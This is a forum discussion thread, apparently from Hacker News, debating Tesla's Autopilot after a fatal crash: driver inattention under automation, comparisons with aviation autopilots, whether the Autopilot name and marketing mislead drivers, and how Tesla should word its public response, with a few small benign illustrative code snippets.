Bus seats are awful. Why? Because they're made vandal-resistant (and hard-wearing). They're too small for a lot of people now as well. So you need to remodel buses, IMO; you're going to need to be harder on vandals, so change the approach of the courts. Things bifurcate across areas of society like that: supermarkets, houses, zoning, etc. are all designed with mass car ownership as a central tenet.
This is certainly possible and I would welcome it but this is something that cannot be done overnight. It will take decades to convince politicians and more decades to upgrade the existing infrastructure.
If you’re willing to die for this, then by all means go ahead and sign up to be a dummy on a test track. If you know other people who feel the same way, sign up as a group. If you’re just talking about letting other people die so that someday, maybe we’ll have fully automated cars, that’s monstrous, especially when they’re not volunteers and don’t get to opt out!
A laudable goal doesn't give anyone the right to kill people by taking unnecessary risks. The reason that Tesla and Uber do what they do the way they do it, instead of taking a more conservative approach, is an attempt to profit, not to save lives. If you don't have to spend lives to make progress, but choose to do so for economic expedience, there's a word for that: evil.
I agree with the psychology aspect of driving. I've seen it mentioned many times that a large majority of auto accidents occur a few minutes from the driver's home, and usually on their way home. Apparently, being close to their neighbourhood and in familiar surroundings, the driver's attention tends to wane as they get distracted with other things that they have to do when they get to their house.
Racing drivers have also reported that when they are not driving at 100%, they are more prone to making mistakes or crashing. Most famously, there was Ayrton Senna's crash at Monaco when he was leading the field by a LONG way. When he was asked why he crashed at a fairly innocuous slow corner, he said that his engineer had asked him over the radio to 'take it easy' as there was no chance he would be challenged for 1st place before the finish line, so he relaxed a fraction and started thinking about the victory celebrations. And crashed.
>I don't even enable cruise control because taking the accelerator input away from me is enough to cause my mind to wander
You're not alone. I find the act of modulating my speed is what keeps me focused on the task of driving safely. Steering alone isn't enough; I can stay in my lane without tracking the vehicles around me or fully comprehending road conditions.
Until a Level 5 autonomous car is ready to drive me point A to point B while I watch a movie I will remain firmly in command of the vehicle.
The problem as always with driving is that you can be as attentive, sober, and cautious as humanly possible... while the guy who jumps the median into your windscreen may not be. We need to be more concerned and proactive about stopping this running experiment with half-assed automation in which we all unwillingly participate. I want Level 5 automation just like anyone, but I don't believe it's anywhere close, and I'm not interested in being part of Tesla's or Uber's attempt to get even richer.
Public roads are not laboratories. It’s not just Tesla owners who are participating in this, it’s everyone on the road with them.
I noticed this also: no need to monitor and adjust the speed, which is a mundane task (in cruise-control traffic conditions). Eyes can be on the road instead.
This is similar to the problem for pilots, who can be distracted by mundane tasks due to the complexity of controls in modern aircraft. If those tasks are removed, the pilot can focus on what's more important.
According to NASA: "For the most part, crews handle concurrent task demands efficiently, yet crew preoccupation with one task to the detriment of other tasks is one of the more common forms of error in the cockpit."
I think growing up in a snowy climate where super precise throttle control is critical to not ending up in ditches plays a huge role in why I zone out when using cruise control. The fine motor skill of throttle control occupies the back of my mind while my conscious thoughts rotate through the mirrors, track other vehicles and watch for obstacles. I can maintain a speed within a couple km/hr for a very long time without needing to glance at the speedo at all.
The moment the back of my mind doesn't have to handle precise throttle control, I find my mind wandering and my spatial awareness is shot. I guess maintaining speed is the fidget spinner that keeps me focused on the task of driving.
I totally agree with this sentiment -- the only reason I drive a safe speed is that I use cruise control constantly. Then I don't have to think about speed, and I can focus on everything else.
Adaptive cruise control is a bit annoying in traffic, as the safety buffer lets drivers who don't care about tailgating easily move into the gap, causing my speed to jolt around a lot (and eventually I get stuck behind some slow-moving vehicle). It just doesn't work well in heavy two-lane traffic, I guess.
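That jolting falls out of the control law itself. A toy constant-time-gap controller (the gains and the 1.5 s gap are my own assumptions, not any manufacturer's tuning) shows why a cut-in forces an immediate brake:

    # Toy constant-time-gap ACC controller. Gains and the 1.5 s gap are
    # illustrative assumptions, not any manufacturer's tuning.
    TIME_GAP_S = 1.5
    K_GAP, K_SPEED = 0.4, 0.8

    def acc_accel(own_speed, lead_speed, gap_m):
        """Return commanded acceleration (m/s^2) for a following car."""
        desired_gap = TIME_GAP_S * own_speed
        # A cut-in makes gap_m shrink suddenly, so the first term goes
        # sharply negative and the controller brakes: the "jolt".
        return K_GAP * (gap_m - desired_gap) + K_SPEED * (lead_speed - own_speed)

    print(acc_accel(own_speed=30.0, lead_speed=30.0, gap_m=45.0))  # 0.0, settled
    print(acc_accel(own_speed=30.0, lead_speed=28.0, gap_m=20.0))  # -11.6 after a cut-in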
> This needs far more discussion. I just don't buy it. I don't believe that you can have a car engaged in auto-drive mode and remain attentive. I think our psychology won't allow it.
Does anyone know of psychology studies that measure human reaction time and skill when something like autopilot is engaged most of the time? I remember taking part in a similar study at Georgia Tech that involved firing at a target using a joystick. It was also simultaneously a contest, because only the top scorer would get prize money. The study was conducted in two parts. In the 1st phase, the system had auto-targeting engaged. All subjects had to do was press a button when the reticle was on the target in order to score. In the 2nd phase, which was a surprise, auto-targeting was turned off. I won the contest and my score was miles ahead of anyone else's. I can't fully confirm it, but I feel this happened because I was still actively aiming for the target even when auto-targeting was active.
> Does anyone know of psychology studies that measure human reaction time and skill when something like autopilot is engaged most of the time?
Yes. That's been much studied in the aviation community.[1] NASA has the Multi-Attribute Test Battery to explicitly study this.[2] It runs on Windows with a joystick, and is available from NASA. The person being tested has several tasks, one of which is simply to keep a marker on target with the joystick as the marker drifts. This simulates the most basic flying task - flying straight and level. This task can be put on "autopilot", and when the marker drifts, the "autopilot" will simulate moving the joystick to correct the position.
But sometimes the "autopilot" fails, and the marker starts drifting. The person being tested is supposed to notice this and take over. How long that takes is measured. That's exactly the situation which applies with Tesla's "autopilot".
There are many studies using MATB. See the references. This is well explored territory in aviation.
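For intuition, here is a stripped-down sketch of that kind of takeover-time measurement. The glance model and all timings are my own illustrative assumptions, not MATB's actual parameters; the point is just that the less often you check, the longer a silent failure goes unnoticed.

    import random

    # Stripped-down MATB-style monitoring task, illustrative numbers only.
    def takeover_lag(fails_at_s: float, scan_interval_s: float) -> float:
        """Seconds between a silent autopilot failure and the next glance."""
        t = 0.0
        while True:
            # Subject glances at the tracking display at random intervals.
            t += random.expovariate(1.0 / scan_interval_s)
            if t >= fails_at_s:
                return t - fails_at_s

    random.seed(0)
    for scan in (2.0, 10.0):   # attentive vs. complacent monitoring
        lags = [takeover_lag(fails_at_s=60.0, scan_interval_s=scan)
                for _ in range(10_000)]
        print(f"glance every ~{scan:4.0f}s -> mean takeover lag "
              f"{sum(lags) / len(lags):4.1f}s")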
As a user of autopilot in aviation context, I do remain engaged and connected to the flight while the autopilot handles the routine course following and altitude hold/tracking responsibilities.
I don’t find that particularly challenging and in fact, when the autopilot is INOP, flights are slightly more mentally fatiguing because you have no offload and complex arrivals are much more work, but in cruise, you have to be paying attention either way. It’s not a time to read the newspaper, autopilot or not.
Quite a lot of years ago, I had to drive for 6 hours straight at night to get to the place I needed to be on time (flying was not available to me back then).
What I noticed was that when I was following the posted/safe speed limit, I quickly lost focus, my mind started wandering, and eventually I felt I was falling asleep.
I do not remember what made me speed up, but once I was going about 30% faster than the posted speed limit, and once I reached a part of the route where the road was quite bad and a lot of road work was happening, I realized that I was much more alert.
As soon as I slowed down to the posted speed limit, I began drifting away again.
If anything, my anecdote confirms your theory: as soon as we perceive something as safer, we pay way less attention. And Autopilot sounds like one of these safety things that makes drivers less attentive and potentially miss dangerous situations that would otherwise be caught by the driver's mind.
I wonder if there is a way to introduce autopilot help without actually giving the driver a sense of security. Granted, Tesla would lose a precious marketing angle, but if their autopilot worked somewhat like a variable power steering system, in the background and without obviously taking over control of the car, wouldn't that be more beneficial in the long haul?
Assuming you were in a vehicle with an ICE, speed relates to vibration/noise, which can, at the wrong pitch, easily cause drowsiness. This is why parents will take their children out in the car if a child is not sleeping well.
I find rough motorway surfaces in my current vehicle induce heavy drowsiness at motorway speed limits (slightly reduced at marginally higher speeds, when the pitch is higher).
Your belief is meaningless, we have hard data that shows a net benefit to these systems.
It's not a question of zero deaths; it's a question of reducing the number, which means you need to look beyond individual events. Remember, the ~90 people who died yesterday in US car accidents without making the news are far more important than a few individuals.
>> Your belief is meaningless, we have hard data that shows a net benefit to these systems.
No, we don't. Tesla likes to compare their deaths per mile to the national average. The problem is that their Autopilot is not fit to drive everywhere or in all conditions that go into that average. There is no data to support that Autopilot is safer overall. It may not even be safer in highway conditions, given that we've seen it broadside a semi and now deviate from the lane into a barrier, both in normal-to-good conditions.
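To make the statistical trap concrete, here's a toy example (every rate below is invented for illustration): a system that only drives the easy miles can beat the blended national average while still being worse than humans on those same miles.

    # Invented rates, just to show the statistical trap (fatalities per
    # 100M miles; highways are much safer than city streets).
    HUMAN_HIGHWAY, HUMAN_CITY = 0.5, 2.0
    HIGHWAY_SHARE = 0.3          # assumed share of human miles on highways

    human_overall = (HIGHWAY_SHARE * HUMAN_HIGHWAY
                     + (1 - HIGHWAY_SHARE) * HUMAN_CITY)   # = 1.55

    AUTOPILOT_HIGHWAY = 1.0      # assumed: 2x worse than humans on highways

    # Autopilot logs highway miles only, so 1.0 still "beats" the blended
    # national average of 1.55, despite being worse than humans in the
    # only conditions it actually operates in.
    print(human_overall, AUTOPILOT_HIGHWAY, HUMAN_HIGHWAY)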
Specific failures are again meaningless. Computers don't fail the way people do; on the other hand, people also regularly fall asleep at the wheel and do similarly dumb things.
And really, driving conditions are responsible for a relatively small percentage of vehicle fatalities. Most often it's people doing really dumb things like driving 100+ MPH.
The only thing we actually know is that these cars are safer on average than similar cars without these systems. That's not looking at how much the systems are used, just at their existence, and it likely relates to them being used when drivers are extremely drunk or tired, both of which are extremely dangerous independent of weather conditions.
So how about we adopt much cheaper and simpler solutions like drowsiness detection (Volvos have this), automatic emergency braking (I think every brand has this as an option now), breathalyzer locks, speed limiters, etc.?
The US just mandated all new cars have backup cameras, but it seems like mandating AEB would make a bigger difference.
> Your belief is meaningless, we have hard data that shows a net benefit to these systems.
What do you know that the rest of us don't? The only statistics I've seen on anyone's self-driving cars so far would barely support a hypothesis that they are as capable as an average driver in an average car while operating under highly favourable conditions.
>I don't believe that you can have a car engaged in auto-drive mode and remain attentive
I've been saying this for a while, and it's interesting to see more people come around to this point of view. There was a time when this idea was unpopular here, owing mostly to people claiming that autonomous cars are still safer than humans, so the risks were acceptable. I think there are philosophical and moral reasons why this is not good enough, but that goes off-topic a bit.
In any case, some automakers have now embraced the Level-5-only approach, and I sincerely believe that goal will not be achieved until either:
1. We achieve AGI or
2. Our roads are inspected and standards are set to certify them for autonomous vehicles (e.g. lane marking requirements, temporary construction changes, etc.)
Otherwise, I don't believe we can simply unleash autonomous vehicles on any road in any conditions and expect them to perform perfectly. I also believe it's impossible to test for every scenario. The recent dashcam videos have convinced me further of this [0].
The fact that there are "known unknowns" in the absence of complete testability is one major reason that "better than humans" is not an ethical standard. We simply can't release vehicles onto the open roads when we know there are situations in which a human would outperform them in potentially life-saving ways.
I suppose it's perhaps how they marketed the feature. We have a parking-assist feature in many cars; there's a reason it's not called auto-park instead. If Autopilot really was a feature to help attentive drivers avoid accidents, it probably would have been called driving-assist tech and not autopilot.
I agree, I find the same of myself, and I beat myself up over any loss of concentration.
The solution might be a system where the driver drives at a higher level of abstraction, but ultimately still drives.
Driving should be like declarative programming.
For example, the driver still moves the steering wheel left and right, but the car handles the turn.
Or when the driver hits the brakes, which is now more of an on/off switch, the car handles the braking.
The role for the driver is to remain engaged, indicating their intention at every moment and for the car to work out the details.
Edit: On second thought, that might end up being worse. I can think of situations where it might become ambiguous to the driver of what they are handling and what the car is handling. Maybe autopilot is all or nothing.
> When driving, I find that I must be engaged and on long trips I don't even enable cruise control because taking the accelerator input away from me is enough to cause my mind to wander.
Glad I'm not the only one doing it. When driving on a highway, I increase or decrease my car's speed by 10-15 km/h every 10 minutes or so, so that this variation can help me stay attentive to my surroundings.
This comparison really only works if you mean engaging autopilot with a bunch of other planes flying in close formation and if clouds were made of steel and concrete. Most of the time that autopilot is engaged on a flight there is next to zero risk of a collision. Commercial pilots also get a lot of training specifically related to what autopilot is and isn’t appropriate for.
Even as a private pilot you are taught to continuously scan your instruments and surroundings as you fly through the air with autopilot enabled. Flight training is much more extensive than driving tests (although still not too bad) and they really drive procedures into you.
Which is why pilots are still in control of the plane while autopilot is active. Even while active, there is still a "pilot flying" and pilots are still responsible for scanning gauges and readouts and verifying the autopilot is doing what they expect. They do not just turn on autopilot and goof off
Just like Tesla's Autopilot? Drivers are supposed to be "flying", scanning gauges and the road ahead to ensure the autopilot is doing what they expect...
I think people that say that "autopilot" is a bad name for this feature don't really understand what an "autopilot" does.
The text at the top of the homepage for Tesla Autopilot is this:
> Full Self-Driving Hardware on All Cars
> All Tesla vehicles produced in our factory, including Model 3, have the hardware needed for full self-driving capability at a safety level substantially greater than that of a human driver.
Whatever theory you have for Tesla's naming of their feature, it doesn't match with their marketing.
You are reading into that text more than you should. Autopilot and full self-driving are two separate features. Autopilot can be used today. Full self-driving can be purchased today but won't be activated until some unknown future date. Those features are separate configurable options when purchasing the car that come with their own prices. Tesla makes it clear enough that any owner should know those are two separate features. The text you highlighted is simply promising that any car purchased today can activate full self-driving down the line with no additional hardware costs.
> You are reading into that text more than you should.
The page's title is "Autopilot | Tesla". It is the first result for "tesla autopilot" in search results. And "autopilot" appears 9 times on the page. So if that's not an intentional attempt to mislead consumers into conflating Autopilot with "full self-driving", then what would such an attempt look like, hypothetically?
Is it crazy to hold a driver to a higher standard than simply Googling "Tesla autopilot" and only reading the first paragraph of the first result? If you read that entire page, the difference between autopilot and full self-driving is clear. If you read the car's manual, the difference is clear. If you look at the configurator for the car, the difference is clear when you have to pay $3,000 extra for full self-driving. I am not sure how any responsible Tesla owner could think that this is only a single feature.
> Is it crazy to hold a driver to a higher standard than simply Googling "Tesla autopilot" and only reading the first paragraph of the first result?
For this standard, it would have to apply to every driver. Should drivers who do not google "Tesla autopilot", let alone ones who do and read on into a section about said autopilot feature, be punished with death in a two-ton metal trap?
I really don't see how this is different from other features of a car, like cruise control. It is up to the driver to educate themselves about cruise control. It was not part of my driver education class. There were no questions about it during the tests to get my license. I didn't learn how it worked until I was in my 20s, when I first owned a car that had cruise control, and I learned by reading that car's manual. I don't think anyone would have blamed the manufacturer if I had killed myself because I didn't understand how cruise control worked or used it improperly.
It isn’t crazy to ask that, but I think it is crazy to view failing to create two pages as an intentional attempt to deceive or as something that absolves drivers of their own responsibilities.
If Autopilot crashes at a lower rate than the average driver, they are correct, but Autopilot plus an attentive driver would still be better than either alone.
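That intuition is just the product rule under an independence assumption, which is itself doubtful here. A quick sketch with made-up numbers:

    # Made-up per-hazard miss probabilities, just to show the arithmetic.
    # Independence between human and autopilot misses is a strong
    # assumption; complacency (this whole thread) is exactly what breaks it.
    p_human = 1e-6       # attentive human misses a given hazard (assumed)
    p_autopilot = 5e-6   # autopilot misses the same hazard (assumed)

    p_both = p_human * p_autopilot   # 5e-12, but only if truly independent

    print(f"human alone: {p_human:.0e}, autopilot alone: {p_autopilot:.0e}, "
          f"both miss (if independent): {p_both:.0e}")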
The current thread is about what Tesla means by use of "autopilot". The parent commenter was telling us that Tesla only intends for it to have the same meaning as it does in aviation. My response is pointing out how Tesla seems to imply "autopilot" involves "full self-driving".
At what point is an attentive driver expected to notice that autopilot has silently failed? The video linked at the top of the thread has a <1 second interval between the car failing to follow its lane, and plowing into a concrete barrier.
This is actually harder to do than just driving the car.
The fatal impact may not be seconds away but the event that sets in motion the series of actions that results in that fatal impact may take only seconds.
The issue is how long between the problem first manifesting itself and a crash becoming inevitable. Note that even as short a time as ten seconds is an order of magnitude longer than one second. There are at most only a few rare corner cases in aviation where proper use of the autopilot could take the airplane within a minute of an irretrievable situation that would not have occurred under manual control.
I'm not a pilot so I do not know the most dangerous situations when flying under autopilot. What I was trying to emphasize is that even under autopilot airplanes require constant attention. My understanding is that if the pilot or co-pilot leaves the cockpit for any reason the remaining pilot puts on an oxygen mask in case of decompression because the time frame before blackout is so tiny. The point is that autopilot in aviation is a tool that can be employed by pilots but cannot function safely on its own. From this viewpoint Tesla's Autopilot is accurately named although the public does not have the same understanding.
There are a lot of things in aviation that are done out of an abundance of caution (and rightly so) rather than because flights are routinely on the edge of disaster. Depressurization is not an autopilot issue, and putting on a mask is not the same as constant vigilance. Even when not using autopilot, pilots in cruise may be attending to matters like navigation and systems management that would be extremely dangerous if performed while driving.
Personally, I do not think calling Tesla's system 'autopilot' is the issue, but your claim that it is accurate is based on misunderstandings about the use of autopilots in aviation. It is not the case that their proper use puts airplanes on the edge of disaster were it not for the constant vigilance of the pilots.
If the pilots are not flying, then the plane can be just a short time away from a crash. Like when the pilot is not paying attention, and by the time the autopilot can no longer fly, the pilot doesn't have enough situational awareness to take over.
That is very much an outlier, and if it were at all relevant to the issue it would further weaken your case, as these three pilots had several minutes to sort things out. Questioning the assumptions underlying the assumed safety of airplane autopilot use can only weaken the claim that Tesla's 'autopilot' is safe.
This isn't a debate about dictionary definitions, it's a debate about human behavior.
People who say that "Autopilot" is a bad name for this feature aren't basing it on an imperfect understanding of what autopilot does in airplanes. They're basing it on how they believe people in general will interpret the term.
So you’re saying that Tesla drivers are only educated by marketing materials and ignore what the car says every time they engage the autopilot feature?
They are saying that Tesla drivers are not superhumans, only average, everyday, garden-variety human beings...
The funny thing is that the same people who argue for self-driving tech by saying "humans will do dumb shit" are the ones who justify Tesla by saying "humans should not do stupid things (like ignoring the car's warnings)"...
They aren't going to literally fall asleep, but much of the time pilots are reading a book and not directly paying attention the way a driver must.
Planes don't suddenly crash into a mountain because you have looked away for two seconds, there is much more time to react in case the autopilot doesn't behave correctly.
They can very suddenly crash into another plane because you have looked away for two seconds. It has actually happened (though nowadays, technology has made it easier to avoid these accidents).
Planes are supposed to maintain a 5-mile separation distance. You aren't going to close that in two seconds. (Head on, with both planes traveling 600 MPH, you can do it in 15 seconds. But both pilots would have to be inattentive for that whole time.)
They are supposed to, but if flight control doesn't help them do it, pilots have only very little time to react to what they meet. This was demonstrated in the Hughes Airwest collision with an F-4 in 1971.
Since then, air traffic control procedures have been improved to avoid these situations, but nowadays e.g. over the Baltic Sea, Russian military planes are routinely flying with their transponder turned off so that flight control does not know where they are. So, this risk is still there.
I don't buy it either, and the airline business has lots of history to show that it is bunk. An autopilot must either be better than humans or not be present. I'm sure the car autopilot engineers have learned much from airplanes. And I'm pretty sure that Tesla management has overridden the engineers' concerns because they'd rather move fast and break things.
If a person uses a device while using Autopilot (which seems highly likely, though I'm not sure in this instance), wouldn't it be advisable to have the alerts come to them directly on whichever device they are using? The alert breaks them out of whatever task they are focusing on. If the alert is coming from the car, I can see how a lot of us could ignore it.
What a world. Where we can't even take enough responsibility to be present enough to hear the "You are about to die" bell chime.
Imagine the possible breaking components in that chain, too. Bluetooth can fail, satellite can fail, cell can fail, WiFi can fail, a USB cable can fail; there isn't a single piece of connectivity technology that would make me confident enough to delegate alerts to another device.
There is also an inherent failure mode of alarms in general: even very loud ones can be ignored if they give false positives even once or twice. There is a body of research trying to address this. Some of the most fatal industrial accidents occurred because alarms were either ignored or switched off entirely. We aren't good with alarms.
I think the meat of it, though, is that unless Autopilot works perfectly, you can't leave it alone. And if you can't leave it alone, then what's the point?
The sell for autonomous cars isn't that people are just so darn tired of turning the steering wheel that they would really rather not. It's that we could potentially be more productive if we could shift our full attention to work/study/relaxation while commuting.
It seems like we are in an "in-between" state where we are using humans to assuage the fears of people who aren't sure whether neural networks can drive better than humans. The goal is to eventually focus on something else. If it's just about making driving safer, I would think it's more of an incremental innovation step versus the breakthrough concept of being able to do something else while being driven entirely by a neural-network-controlled vehicle. The bridge to get to this breakthrough hopefully isn't hacked apart by naysayers. Every death should be met with empathy and a desire to strengthen this bridge and quicken the speed of crossing it.
I try to tell people that if you cannot take a nap behind the wheel of a self-driving car, then the automaker has failed to produce a self driving car. If you have to be attentive behind the wheel of a self driving car, then you might as well just steer it yourself.
The general sentiment is correct but the wording implies some degree of acceptance of liability: Autopilot was engaged... took no evasive action... engineers are investigating... failed to detect.
They should have issued a single, very simple statement that they are investigating the crash and that any resulting improvements will be distributed to all Tesla vehicles, so that such accidents can no longer happen even when drivers are not paying sufficient attention to the road and ignore Autopilot warnings. Then double down on the idea that Autopilot is already safer than manual driving when properly supervised and that it constantly improves.
The specifics of the accident, the victim blaming, whether or not the driver had his hands on the wheel or was aware of Autopilot's problems: that is something that should be discussed by lawyers behind closed doors. And of course, deny it media attention and kill it in the preliminary investigation, which I imagine they will have no problem doing; he drove straight into a steel barrier, for God's sake.
Doesn't help that fucking Elon Musk and half of Silicon Valley keep saying AI technology will solve all driving problems, when they should know full well that autonomous cars are never going to happen without structural changes to the roads themselves.
Silicon Valley needs to stop trying to make autonomous cars happen.
What structural changes? Considering that self-driving cars are already running daily in many cities, those changes must be fairly minor since they've already been implemented in those cities.
Volvo's messaging is less reckless than Tesla's. They call their similar feature "Pilot Assist." It's also always been stricter about trying to make sure the driver is engaged when it's enabled. As a Volvo owner, I'll admit I find it annoying at times, but I think it's also helped drill into me that I shouldn't trust Pilot Assist not to drive me into a barrier. It's amazing at keeping me in my lane when I'm fiddling with my podcast feed though.
>It's amazing at keeping me in my lane when I'm fiddling with my podcast feed though.
I hate to be sanctimonious at people online but this is how people get killed. Is it not illegal to do this where you live? In the UK you'd be half way to losing your license if you got caught touching a phone while driving (and lose it instantly if within the first 2 years of becoming a qualified driver).
You just said it yourself, you can't trust it, so don't play with your phone while driving, lane assist or not.
He didn't mention a phone, however... it's 2018; people who can afford that type of car must have podcast-friendly onboard entertainment. Which is as dangerous as fiddling with the radio, but not illegal.
I have a Volvo as well and it is annoying when the dashboard goes nuts warning of impending doom when experience tells me that the vehicle/obstacle ahead isn't actually an issue. That said, it has saved my bacon at least once at an unfamiliar highway exit in rush hour when traffic went from 40mph to a dead stop almost immediately.
Lane assist has also led me to be much better about always signaling lane changes lest the steering try to fight me.
> It's amazing at keeping me in my lane when I'm fiddling with my podcast feed though.
That's exactly what the Tesla driver must have thought too. Right until the Autopilot steered directly into a barrier. Volvo's system may be better, but any lapse in attention can lead to the type of crash we are discussing.
I wonder if Tesla decided they want to own the term 'autopilot' at a short-term expense, forcing other manufacturers to use less obvious names down the track. Because it seems strange they would stick with a term that could encourage lawsuits and frivolous behaviour by drivers.
I see this argument so often. Autopilot has never been a term for autonomy; that matches how it's used in aviation. Just because people don't know the proper term, or have an erroneous idea of it, doesn't mean Tesla has to bear the burden of people misinterpreting what it says.
See, I'm not sure if you know this... but most people are not pilots. (Disclaimer: I'm not only a programmer, but also hold an A&P and avionics license, as well as a few engine ratings.)
It is ABSOLUTELY on a manufacturer to make sure their potentially life-ending feature is not named in a way that can confuse the target audience. You know: NON-PILOT car drivers.
Arguing with Tesla/Musk fanatics now is like arguing with Facebook/Zuck fanatics was ten years ago, or saying that a Google was bad news in their “don’t be evil” days. You’re right, but only time and loads of evidence will convince some people that what they desperately want to believe isn’t true.
Of course “Autopilot” is intended to evoke the common meaning as a marketing tool, and not the nuanced, highly technical meaning understood by pilots. Understand though, that when someone argues against that point the pedantry is just a proxy for their fanaticism, and until the fanaticism dies, the excuses will be generated de novo. You’re bringing reason and logic to an emotional fight.
I would really prefer not to be called a fanatic just because I believe that the term "autopilot" isn't a proxy for "autonomous". I've always seen that autonomy is a goal of Tesla's, but they have always said their system is limited and that it requires vigilance.
Forgive me, but I've never seen any plane where, once in autopilot, the pilot(s) are not checking and observing the condition of the plane and making sure everything is alright.
And yet, I don't recall ever, in any documentary or so, having seen the pilots get up and leave once the autopilot is on. They have humongous checklists to parse, do they not?
I want you to go on Wikipedia (is that not mainstream enough?) and search for the term Autopilot. Read its ACTUAL definition and come back, please.
> Autopilot has never been a term for autonomous, just as its used in aviation.
Autopilots used in modern commercial airplanes are autonomous. You don't have to watch them, they will do their job. The airplane is either controlled by the pilots or the autopilot. There is a protocol to transfer the control between pilots and the autopilot, such that it is clear who is in charge of controlling the plane (there's even a protocol to transfer this between pilots).
The autopilot will signal when it is no longer able to control the plane (because of, e.g., technical faults in the sensors).
Yes, there are also autopilots in smaller airplanes which are more or less just cruise control. But everything in between, where it is unclear who is doing what and where the limits of the capabilities are, has been scrapped because people died.
> doesn't mean tesla has to have the burden of people misinterpreting what it says.
Because Tesla is oh so clear in stating what their autopilot is able to do and what it isn't.
Do you believe Tesla bears the burden of maintaining its own homepage? tesla.com/autopilot currently has "Full Self-Driving Hardware on All Cars" as its top headline and has had that for awhile now.
Well, they do have the hardware, that isn't the issue.
The cars simply lack the software to enable a fully autonomous vehicle. The phrasing indicates that if/when the software becomes available, the car would be theoretically capable of driving itself.
It's just a typical misleading marketing blurb; nothing more.
They don't actually know that they have hardware for full autonomy till they have a fully working hardware/software autonomy system; what they have is hardware that they hope will support full autonomy, and a willingness to present hopes as facts for marketing purposes.
Yes, it is the issue because no one has achieved full self-driving yet so Tesla simply has no idea what hardware may be required to achieve that level of functionality in real-world situations.
But that wasn't the line of argument I was making. The parent commenter said this about people misunderstanding the term "autopilot":
> Just because people don't know the proper term or have an erroneous idea of the term, doesn't mean tesla has to have the burden of people misinterpreting what it says.
Seems like people might be mistaken because the phrase "Full Self-Driving" is literally the first thing on the official Tesla Autopilot page.
In a sense, though, without the software the hardware isn't self-driving, which is at least enough to be misleading. If you saw "Full Voice-Recognition Hardware on All Computers", you would expect it to actually recognise voices, not just come with a microphone.
The problem is that Tesla creates the misinterpretation by explicitly stating that Autopilot is a self-driving system rather than a driver-assist system.
But check out my Full Self Driving AP2 hardware, driving coast to coast! You can even ask your car to earn you money on Tesla Network! Tesla Autopilot twice as safe as humans in 2016! Sentient AI will kill humans!
You seem to understand the difference. Everyone in this thread seems to understand the difference. So why should anybody believe a failure to understand the term is a problem?
What a stark difference in tone this kind of statement would have made. Tesla's statement reeks of a desire to protect themselves from liability or a potential lawsuit. It's very sad to see them adopting such language in the face of such a tragedy.
Not Tesla, but they can afford to pay someone to write a thoughtful and sympathetic response to a tragedy in a way that also protects them from a lawsuit.
This sample statement makes it very clear that the user was misusing autopilot and trusting it beyond its intended function, but also shows sympathy for the family's situation.
They say they can't possibly afford to have cars download the maps at the wifi of service stations, yet they don't see any issue with leeching off Starbucks' free wifi. How anyone could have written that e-mail with a straight face is beyond me.
The problem with releasing statements like this is they can be used against Tesla in court. Anything that seems like an admission of guilt or responsibility will be used against them, which is why we see so little of it.
>Doesn't your statement admit that Tesla is at least partially at fault? Something their lawyers would probably never allow.
IANAL so take with a grain of salt. I once talked to a lawyer who used to work for a big hospital and handled the malpractice lawsuits against them. Three takeaways from the discussion:
1. Implying that a possibility exists that the hospital was at fault has no legal ramifications whatsoever.
2. Studies show an apology and admission have a significant impact on the amount paid to the patient if there is a settlement (in the hospital's favor).
3. Despite knowing 1 and 2, he and other lawyers advise their clients to deny wrongdoing all the way to the end.
Trust is the final layer of competition, and trust comes with accountability and taking responsibility. If Tesla et al. don't have this fear driving them to do right, then they will lose our respect and our hearts.
How should one deploy such a product at all?
Actual usage is really the only way anyone will know if the models are trained appropriately to handle most/all situations they will encounter in the real world.
> Actual usage is really the only way anyone will know if the models are trained appropriately to handle most/all situations they will encounter in the real world.
Because testing stuff before throwing it on the market isn't a thing anymore?
Surely you do not assume that Tesla had done no testing at all before selling these things.
I forwent commenting on their pre-market testing because I assumed that flokie already knew that the cars and the ML models they use had been extensively tested on tracks and in simulation before the first Tesla was allowed on California roads.
And they would have been complete idiots had they not done such testing; no investors would have funded that.
Reactions like flokie's were completely predictable the moment driver assistance techniques were thought of. The only acceptable response a company can have to such criticism is "we have tested this extensively and it is safer than driving manually".
Market forces aside, no car drives on roads in any US state without extensive testing and certification. All of the companies testing self-driving technology had to get special permits to do so.
"And furthermore, here is why we don't see fit to stop using the name Autopilot, even as we recognize that false sense of security it implies to the average person: ..."
You don't think there's an implied difference between Autopilot and a name like Driver Assist? Even Co-pilot would be a better name, as it implies an expectation that the driver is still ultimately responsible.
I'm asking for data. The data doesn't care what you and I think. And the data will reflect what Tesla drivers think, as opposed to people who've only heard Tesla's marketing. Tesla drivers get reminded about the limitations of the autopilot system each time they enable it.
The literally hundreds of posts on HN about it being a problem are data that it is. And that's a tech-savvy crowd that theoretically would know the limitations of the system.
There are literally hundreds of posts on HN claiming that it's a problem. That's data for it being a commonly-held belief, not data for it being a problem with actual Tesla drivers.
The only posts I saw on HN are claiming that it is a problem. If anything, that's evidence that it's not actually a problem, because people are recognising that it _might_ be misleading, rather than _being_ misled.
Tesla has world-class PR, let's assume they're saying the right thing. What circumstances might they be facing to which this message is a correct response?
I personally like your style and tone. At a glance I would only replace his first name with Mr. to increase respect and depersonalize it.
I think it’d be a tough sell to get the blessing of Tesla’s legal team. Given Musk’s position he could override that, of course, but it could still reduce the likelihood of it going out.
Overall as much as I prefer it, I think most companies wouldn’t release something this direct and honest. Although that’s changing at some companies as they find that the goodwill built through lack of bullshit can sometimes outweigh distasteful liability defense techniques.
They’re really digging themselves a hole. Can you imagine explaining to a jury that your “autopilot” isn’t “fully-autonomous” and trying to justify that as not misleading by pointing to “autopilots in aviation?”
It's called a 'brand name' and people are surrounded by them. I can't eat my Apple MacBook, despite the fact it is misleadingly branded as fruit. Everyone in this thread seems perfectly capable of understanding that 'autopilot' doesn't mean 'fully autonomous', and they got to that understanding through the fairly mundane and routine method of thinking about it.
It seems like Tesla is careful not to dispel the illusion that it can. Like how alcohol does not get you women, but all the adverts deftly imply it can, without actually saying it can.
Great copywriting. It seems in part this is a user interface issue in that the limitations of the system are not clearly enough surfaced so people’s expectations are off-base.
"from an event like this" is an important part of the statement.
Pretend for a moment that the occurrence of the accident was a foregone conclusion. In such a scenario, the most positive thing that could be done would be to use the information to save the lives of others.
There's a smidgen of humility in the phrasing; that the accident might have been avoidable with the information that has been gained as a result of the accident. Of course, I presume that sort of sentiment would fall squarely under the "admission of guilt" umbrella that prevents companies from saying things like this.
I think of it this way:
Most car manufacturers are releasing their products onto the public year after year, knowing full well that a decent percentage of the people who drive away from the dealership will be killed by the thing they just bought.
Tesla is merely trying to take the next step in reducing that percentage.
